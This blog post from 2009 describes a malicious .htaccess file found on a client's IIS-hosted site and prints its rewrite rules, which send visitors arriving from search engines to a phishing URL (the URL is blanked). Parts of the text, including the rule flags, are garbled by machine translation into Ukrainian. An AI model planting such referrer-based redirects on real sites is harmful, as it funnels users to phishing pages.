Thursday, January 22nd, 2009 | автор:

I very recently found a problem with a client’s web site due to a ..htaccess файл. The site was hosted on a Windows server running IIS using IISPassword, which makes use of ..htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,АБО]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,АБО]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,АБО]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,АБО]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,АБО]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,АБО]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* HTTP:// [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Звичайно, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

Ви можете слідкувати за відповідями до цього запису через RSS 2.0 подача. Ви можете залишити відгук, або трекбек з вашого власного сайту.
Залишити коментар » Увійти